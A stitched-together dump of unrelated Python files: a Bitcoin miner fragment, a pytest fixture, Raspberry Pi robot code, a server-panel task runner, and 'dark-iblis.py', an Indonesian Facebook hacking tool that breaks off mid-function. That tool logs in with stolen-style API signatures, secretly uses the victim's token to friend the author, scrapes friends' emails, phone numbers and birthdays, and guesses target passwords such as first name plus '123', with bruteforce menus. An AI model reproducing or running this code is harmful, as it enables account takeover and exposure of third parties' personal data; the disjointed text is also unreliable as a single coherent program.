self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 7818
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
conftest.py
|
import sys
import threading
from functools import wraps, partial
from http.server import SimpleHTTPRequestHandler
import pytest
import torch.multiprocessing as mp
def pytest_configure(config):
config.addinivalue_line("markers", "spawn: spawn test in a separate process using torch.multiprocessing.spawn")
@pytest.mark.tryfirst
def pytest_pyfunc_call(pyfuncitem):
if pyfuncitem.get_closest_marker("spawn"):
testfunction = pyfuncitem.obj
funcargs = pyfuncitem.funcargs
testargs = tuple([funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames])
mp.spawn(wraps, (testfunction, testargs))
return True
@pytest.fixture
def tmpdir_server(tmpdir):
if sys.version_info >= (3, 7):
Handler = partial(SimpleHTTPRequestHandler, directory=str(tmpdir))
from http.server import ThreadingHTTPServer
else:
# unfortunately SimpleHTTPRequestHandler doesn't accept the directory arg in python3.6
# so we have to hack it like this
import os
class Handler(SimpleHTTPRequestHandler):
def translate_path(self, path):
# get the path from cwd
path = super().translate_path(path)
# get the relative path
relpath = os.path.relpath(path, os.getcwd())
# return the full path from root_dir
return os.path.join(str(tmpdir), relpath)
# ThreadingHTTPServer was added in 3.7, so we need to define it ourselves
from socketserver import ThreadingMixIn
from http.server import HTTPServer
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
with ThreadingHTTPServer(('localhost', 0), Handler) as server:
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
yield server.server_address
server.shutdown()
|
centro_controle.py
|
import RPi.GPIO as GPIO
import time
import threading
from controle import *
from distancia import *
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
SENSOR_DIR = 40
SENSOR_ESQ = 38
estado_ativo = GPIO.LOW
motores = 1
def setup_sensor():
global estado_ativo
GPIO.setup(SENSOR_DIR, GPIO.IN)
GPIO.setup(SENSOR_ESQ, GPIO.IN)
setup_motor()
setup_sensor_som()
if GPIO.input(SENSOR_ESQ) == GPIO.HIGH & GPIO.input(SENSOR_DIR) == GPIO.HIGH:
estado_ativo = GPIO.HIGH
else:
estado_ativo = GPIO.LOW
def esquerdo():
if GPIO.input(SENSOR_ESQ) == estado_ativo:
print("CAMINHO")
return True
else:
print("FORA CAMINHO")
return False
def direito():
if GPIO.input(SENSOR_DIR) == estado_ativo:
print("Caminho")
return True
else:
print("Fora caminho")
return False
def controla_distancia():
global motores
motores = 0
while True:
if roda_medicao() < 30:
print("Colisao")
motores = 0
move_parar()
else:
motores = 1
def prepara_estacionar():
direita = False
esquerda = False
try:
t1 = threading.Thread(target=controla_distancia,args=())
t1.start()
while True:
if motores == 1:
esquerda = esquerdo()
direita = direito()
if direita == True & esquerda == True:
print("FRENTE")
move_frente()
elif direita == False & esquerda == False:
move_esquerda(estado_ativo)
estacionar()
return True
elif direita == False:
print("DIREITA")
move_direita(estado_ativo)
elif esquerda == False:
print("ESQUERDA")
move_esquerda(estado_ativo)
else:
print("Risco de choque")
finally:
GPIO.cleanup()
def estacionar():
while True:
if motores == 1:
esquerda = esquerdo()
direita = direito()
if direita == True & esquerda == True:
print("FRENTE")
move_frente()
elif(direita == False & esquerda == False):
move_parar()
return True
elif direita == False:
print("DIREITA")
move_direita(estado_ativo)
elif esquerda == False:
print("ESQUERDA")
move_esquerda(estado_ativo)
else:
print("Risco de choque")
#setup_sensor()
#find_line()
|
task.py
|
# coding: utf-8
#------------------------------
# 计划任务
#------------------------------
import sys
import os
import json
import time
import threading
# print sys.path
sys.path.append(os.getcwd() + "/class/core")
import mw
# reload(sys)
# sys.setdefaultencoding('utf-8')
import db
# cmd = 'ls /usr/local/lib/ | grep python | cut -d \\ -f 1 | awk \'END {print}\''
# info = mw.execShell(cmd)
# p = "/usr/local/lib/" + info[0].strip() + "/site-packages"
# sys.path.append(p)
import psutil
global pre, timeoutCount, logPath, isTask, oldEdate, isCheck
pre = 0
timeoutCount = 0
isCheck = 0
oldEdate = None
logPath = os.getcwd() + '/tmp/panelExec.log'
isTask = os.getcwd() + '/tmp/panelTask.pl'
if not os.path.exists(os.getcwd() + "/tmp"):
os.system('mkdir -p ' + os.getcwd() + "/tmp")
if not os.path.exists(logPath):
os.system("touch " + logPath)
if not os.path.exists(isTask):
os.system("touch " + isTask)
def mw_async(f):
def wrapper(*args, **kwargs):
thr = threading.Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
@mw_async
def restartMw():
time.sleep(1)
cmd = mw.getRunDir() + '/scripts/init.d/mw reload &'
mw.execShell(cmd)
class MyBad():
_msg = None
def __init__(self, msg):
self._msg = msg
def __repr__(self):
return self._msg
def execShell(cmdstring, cwd=None, timeout=None, shell=True):
try:
global logPath
import shlex
import datetime
import subprocess
import time
if timeout:
end_time = datetime.datetime.now() + datetime.timedelta(seconds=timeout)
sub = subprocess.Popen(cmdstring + ' > ' + logPath + ' 2>&1',
cwd=cwd, stdin=subprocess.PIPE, shell=shell, bufsize=4096)
while sub.poll() is None:
time.sleep(0.1)
data = sub.communicate()
# python3 fix 返回byte数据
if isinstance(data[0], bytes):
t1 = str(data[0], encoding='utf-8')
if isinstance(data[1], bytes):
t2 = str(data[1], encoding='utf-8')
return (t1, t2)
except Exception as e:
return None
def downloadFile(url, filename):
# 下载文件
try:
import urllib
import socket
socket.setdefaulttimeout(10)
urllib.urlretrieve(url, filename=filename, reporthook=downloadHook)
os.system('chown www.www ' + filename)
writeLogs('done')
except:
writeLogs('done')
def downloadHook(count, blockSize, totalSize):
# 下载文件进度回调
global pre
used = count * blockSize
pre1 = int((100.0 * used / totalSize))
if pre == pre1:
return
speed = {'total': totalSize, 'used': used, 'pre': pre}
# print 'task downloadHook', speed
writeLogs(json.dumps(speed))
pre = pre1
def writeLogs(logMsg):
# 写输出日志
try:
global logPath
fp = open(logPath, 'w+')
fp.write(logMsg)
fp.close()
except:
pass
def startTask():
# 任务队列
global isTask
try:
while True:
try:
if os.path.exists(isTask):
# print "run --- !"
sql = db.Sql()
sql.table('tasks').where(
"status=?", ('-1',)).setField('status', '0')
taskArr = sql.table('tasks').where("status=?", ('0',)).field(
'id,type,execstr').order("id asc").select()
# print sql
for value in taskArr:
# print value
start = int(time.time())
if not sql.table('tasks').where("id=?", (value['id'],)).count():
continue
sql.table('tasks').where("id=?", (value['id'],)).save(
'status,start', ('-1', start))
if value['type'] == 'download':
argv = value['execstr'].split('|mw|')
downloadFile(argv[0], argv[1])
elif value['type'] == 'execshell':
execShell(value['execstr'])
end = int(time.time())
sql.table('tasks').where("id=?", (value['id'],)).save(
'status,end', ('1', end))
# if(sql.table('tasks').where("status=?", ('0')).count() < 1):
# os.system('rm -f ' + isTask)
except:
pass
# siteEdate()
# mainSafe()
time.sleep(2)
except:
time.sleep(60)
startTask()
def mainSafe():
global isCheck
try:
if isCheck < 100:
isCheck += 1
return True
isCheck = 0
isStart = mw.execShell(
"ps aux |grep 'python main.py'|grep -v grep|awk '{print $2}'")[0]
if not isStart:
os.system('/etc/init.d/bt start')
isStart = mw.execShell(
"ps aux |grep 'python main.py'|grep -v grep|awk '{print $2}'")[0]
mw.writeLog('守护程序', '面板服务程序启动成功 -> PID: ' + isStart)
except:
time.sleep(30)
mainSafe()
def siteEdate():
# 网站到期处理
global oldEdate
try:
if not oldEdate:
oldEdate = mw.readFile('data/edate.pl')
if not oldEdate:
oldEdate = '0000-00-00'
mEdate = time.strftime('%Y-%m-%d', time.localtime())
if oldEdate == mEdate:
return False
edateSites = mw.M('sites').where('edate>? AND edate<? AND (status=? OR status=?)',
('0000-00-00', mEdate, 1, u'正在运行')).field('id,name').select()
import panelSite
siteObject = panelSite.panelSite()
for site in edateSites:
get = MyBad('')
get.id = site['id']
get.name = site['name']
siteObject.SiteStop(get)
oldEdate = mEdate
mw.writeFile('data/edate.pl', mEdate)
except:
pass
def systemTask():
# 系统监控任务
try:
import system_api
import psutil
import time
sm = system_api.system_api()
filename = 'data/control.conf'
sql = db.Sql().dbfile('system')
csql = mw.readFile('data/sql/system.sql')
csql_list = csql.split(';')
for index in range(len(csql_list)):
sql.execute(csql_list[index], ())
cpuIo = cpu = {}
cpuCount = psutil.cpu_count()
used = count = 0
reloadNum = 0
network_up = network_down = diskio_1 = diskio_2 = networkInfo = cpuInfo = diskInfo = None
while True:
if not os.path.exists(filename):
time.sleep(10)
continue
day = 30
try:
day = int(mw.readFile(filename))
if day < 1:
time.sleep(10)
continue
except:
day = 30
tmp = {}
# 取当前CPU Io
tmp['used'] = psutil.cpu_percent(interval=1)
if not cpuInfo:
tmp['mem'] = sm.getMemUsed()
cpuInfo = tmp
if cpuInfo['used'] < tmp['used']:
tmp['mem'] = sm.getMemUsed()
cpuInfo = tmp
# 取当前网络Io
networkIo = psutil.net_io_counters()[:4]
if not network_up:
network_up = networkIo[0]
network_down = networkIo[1]
tmp = {}
tmp['upTotal'] = networkIo[0]
tmp['downTotal'] = networkIo[1]
tmp['up'] = round(float((networkIo[0] - network_up) / 1024), 2)
tmp['down'] = round(float((networkIo[1] - network_down) / 1024), 2)
tmp['downPackets'] = networkIo[3]
tmp['upPackets'] = networkIo[2]
network_up = networkIo[0]
network_down = networkIo[1]
if not networkInfo:
networkInfo = tmp
if (tmp['up'] + tmp['down']) > (networkInfo['up'] + networkInfo['down']):
networkInfo = tmp
# 取磁盘Io
# if os.path.exists('/proc/diskstats'):
diskio_2 = psutil.disk_io_counters()
if not diskio_1:
diskio_1 = diskio_2
tmp = {}
tmp['read_count'] = diskio_2.read_count - diskio_1.read_count
tmp['write_count'] = diskio_2.write_count - diskio_1.write_count
tmp['read_bytes'] = diskio_2.read_bytes - diskio_1.read_bytes
tmp['write_bytes'] = diskio_2.write_bytes - diskio_1.write_bytes
tmp['read_time'] = diskio_2.read_time - diskio_1.read_time
tmp['write_time'] = diskio_2.write_time - diskio_1.write_time
if not diskInfo:
diskInfo = tmp
else:
diskInfo['read_count'] += tmp['read_count']
diskInfo['write_count'] += tmp['write_count']
diskInfo['read_bytes'] += tmp['read_bytes']
diskInfo['write_bytes'] += tmp['write_bytes']
diskInfo['read_time'] += tmp['read_time']
diskInfo['write_time'] += tmp['write_time']
diskio_1 = diskio_2
# print diskInfo
if count >= 12:
try:
addtime = int(time.time())
deltime = addtime - (day * 86400)
data = (cpuInfo['used'], cpuInfo['mem'], addtime)
sql.table('cpuio').add('pro,mem,addtime', data)
sql.table('cpuio').where("addtime<?", (deltime,)).delete()
data = (networkInfo['up'] / 5, networkInfo['down'] / 5, networkInfo['upTotal'], networkInfo[
'downTotal'], networkInfo['downPackets'], networkInfo['upPackets'], addtime)
sql.table('network').add(
'up,down,total_up,total_down,down_packets,up_packets,addtime', data)
sql.table('network').where(
"addtime<?", (deltime,)).delete()
# if os.path.exists('/proc/diskstats'):
data = (diskInfo['read_count'], diskInfo['write_count'], diskInfo['read_bytes'], diskInfo[
'write_bytes'], diskInfo['read_time'], diskInfo['write_time'], addtime)
sql.table('diskio').add(
'read_count,write_count,read_bytes,write_bytes,read_time,write_time,addtime', data)
sql.table('diskio').where(
"addtime<?", (deltime,)).delete()
# LoadAverage
load_average = sm.getLoadAverage()
lpro = round(
(load_average['one'] / load_average['max']) * 100, 2)
if lpro > 100:
lpro = 100
sql.table('load_average').add('pro,one,five,fifteen,addtime', (lpro, load_average[
'one'], load_average['five'], load_average['fifteen'], addtime))
lpro = None
load_average = None
cpuInfo = None
networkInfo = None
diskInfo = None
count = 0
reloadNum += 1
if reloadNum > 1440:
reloadNum = 0
mw.writeFile('logs/sys_interrupt.pl',
"reload num:" + str(reloadNum))
restartMw()
except Exception as ex:
print(str(ex))
mw.writeFile('logs/sys_interrupt.pl', str(ex))
del(tmp)
time.sleep(5)
count += 1
except Exception as ex:
print(str(ex))
mw.writeFile('logs/sys_interrupt.pl', str(ex))
restartMw()
import time
time.sleep(30)
systemTask()
# -------------------------------------- PHP监控 start --------------------------------------------- #
# 502错误检查线程
def check502Task():
try:
while True:
if os.path.exists(mw.getRunDir() + '/data/502Task.pl'):
check502()
time.sleep(30)
except:
time.sleep(30)
check502Task()
def check502():
try:
phpversions = ['53', '54', '55', '56', '70', '71', '72', '73', '74']
for version in phpversions:
sdir = mw.getServerDir()
php_path = sdir + '/php/' + version + '/sbin/php-fpm'
if not os.path.exists(php_path):
continue
if checkPHPVersion(version):
continue
if startPHPVersion(version):
print('检测到PHP-' + version + '处理异常,已自动修复!')
mw.writeLog('PHP守护程序', '检测到PHP-' + version + '处理异常,已自动修复!')
except Exception as e:
print(str(e))
# 处理指定PHP版本
def startPHPVersion(version):
sdir = mw.getServerDir()
try:
fpm = sdir + '/php/init.d/php' + version
php_path = sdir + '/php/' + version + '/sbin/php-fpm'
if not os.path.exists(php_path):
if os.path.exists(fpm):
os.remove(fpm)
return False
if not os.path.exists(fpm):
return False
# 尝试重载服务
os.system(fpm + ' reload')
if checkPHPVersion(version):
return True
# 尝试重启服务
cgi = '/tmp/php-cgi-' + version + '.sock'
pid = sdir + '/php/' + version + '/var/run/php-fpm.pid'
data = mw.execShell("ps -ef | grep php/" + version +
" | grep -v grep|grep -v python |awk '{print $2}'")
if data[0] != '':
os.system("ps -ef | grep php/" + version +
" | grep -v grep|grep -v python |awk '{print $2}' | xargs kill ")
time.sleep(0.5)
if not os.path.exists(cgi):
os.system('rm -f ' + cgi)
if not os.path.exists(pid):
os.system('rm -f ' + pid)
os.system(fpm + ' start')
if checkPHPVersion(version):
return True
# 检查是否正确启动
if os.path.exists(cgi):
return True
except Exception as e:
print(str(e))
return True
# 检查指定PHP版本
def checkPHPVersion(version):
try:
url = 'http://127.0.0.1/phpfpm_status_' + version
result = mw.httpGet(url)
# print version,result
# 检查nginx
if result.find('Bad Gateway') != -1:
return False
if result.find('HTTP Error 404: Not Found') != -1:
return False
# 检查Web服务是否启动
if result.find('Connection refused') != -1:
global isTask
if os.path.exists(isTask):
isStatus = mw.readFile(isTask)
if isStatus == 'True':
return True
filename = '/etc/init.d/openresty'
if os.path.exists(filename):
os.system(filename + ' start')
return True
except:
return True
# --------------------------------------PHP监控 end--------------------------------------------- #
if __name__ == "__main__":
t = threading.Thread(target=systemTask)
t.setDaemon(True)
t.start()
p = threading.Thread(target=check502Task)
p.setDaemon(True)
p.start()
startTask()
|
dark-iblis.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mEdition-2.3\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m Yoga Wira \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFACEBOOK \x1b[1;91m: \x1b[1;92m \x1b[92mYoga Wira\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mWa \x1b[1;91m: \x1b[1;92\x1b[92m0895611404746\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://www.facebook.com/yoga.wira.188')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
